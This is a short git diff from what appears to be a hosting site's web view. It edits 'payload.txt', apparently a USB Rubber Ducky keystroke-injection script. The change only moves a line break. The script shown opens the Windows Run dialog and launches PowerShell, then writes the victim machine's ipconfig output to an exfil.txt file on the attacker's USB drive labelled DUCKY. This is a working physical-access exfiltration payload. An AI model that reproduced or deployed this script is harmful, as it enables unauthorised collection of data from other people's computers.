Update payload.txt
parent
a323fc3281
commit
1a5aa0bd08
|
@ -54,7 +54,8 @@ DELAY 500
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 300
|
DELAY 300
|
||||||
STRINGLN Powershell
|
STRINGLN Powershell
|
||||||
DELAY 1000DEFINE #DRIVELABEL DUCKY
|
DELAY 1000
|
||||||
|
DEFINE #DRIVELABEL DUCKY
|
||||||
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
||||||
WAIT_FOR_STORAGE_ACTIVITY
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
WAIT_FOR_STORAGE_INACTIVITY
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
|
Loading…
Reference in New Issue